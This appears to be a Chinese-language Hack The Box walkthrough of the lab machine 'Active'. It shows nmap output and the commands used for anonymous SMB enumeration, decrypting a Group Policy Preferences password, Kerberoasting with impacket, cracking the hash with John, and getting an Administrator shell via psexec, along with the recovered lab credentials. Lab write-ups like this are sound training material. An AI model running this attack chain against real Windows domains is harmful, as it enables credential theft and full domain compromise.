攻击机:官方Kali linux 2019 64位
作者:Ikonw

靶机介绍

在这里插入图片描述

一,端口扫描

这边我用的是我在OSCP时候用的一个脚本工具(懒惰)

nmapAutomator
在这里插入图片描述

./nmapAutomator.sh 10.10.10.100 Full
1

除了53和445并没有什么特别能交互的端口

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 18:56 +08
Nmap scan report for 10.10.10.100
Host is up (0.23s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-10 10:57:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 38s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-10T10:58:25
|_  start_date: 2020-02-10T08:17:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.25 seconds

12345678910111213141516171819202122232425262728293031323334353637383940414243444546

一,SMB ENUMERATION

首先 使用smbmap 来确定anonymous用户的权限(如果有写权限可以直接用impacket 来获取shell)

smbmap -H 10.10.10.100
1

发现对 Replication 文件夹 READ ONLY权限
在这里插入图片描述
(这里我本来想使用mount挂载smb, 但失败了。有成功的可以在评论告诉我。)

使用 smbclient进行连接 Replication

smbclient \\\\10.10.10.100\\Replication
1

发现两个有意思的文件夹

31B2F340-016D-11D2-945F-00C04FB984F9 是Default admin policy
6AC1786C-016F-11D2-945F-00C04fB984F9 是Default domain polices
12

在这里插入图片描述
如果没记错的话 windows server 2012以下的版本 会把密码储存在GPO。
经过一番查找
smb: \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups

在此目录发现Groups.xml

在这里插入图片描述
发现帐号和密码哈希值

帐号:active.htb\SVC_TGS
哈希值:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
12

可以使用kali自带的gpp-decrypt来破解密码

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
1

得到密码 GPPstillStandingStrong2k18
在这里插入图片描述
现在我们有了新的帐号 利用Smbmap确认我们是否有写的权限(拿shell)

smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
1

在这里插入图片描述
发现能读权限能读到user目录里的文件
可以用smbclient 进去拿user.txt

三,ROOT

之前看到 端口88 有 kerberos 在运行。尝试利用kerberoasing 攻击

Kerberoasing 攻击

利用 impacket-GetUserSPNs

/usr/bin/impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 

12

在这里插入图片描述
得到hash后 利用john the ripper进行破解
得到 Administrator密码为 Ticketmaster1968
在这里插入图片描述

取到帐号和密码后 我们可以使用 impacket psexec 进行登录

/usr/share/doc/python3-impacket/examples/psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
1

在这里插入图片描述

成功 拿到Administrator




root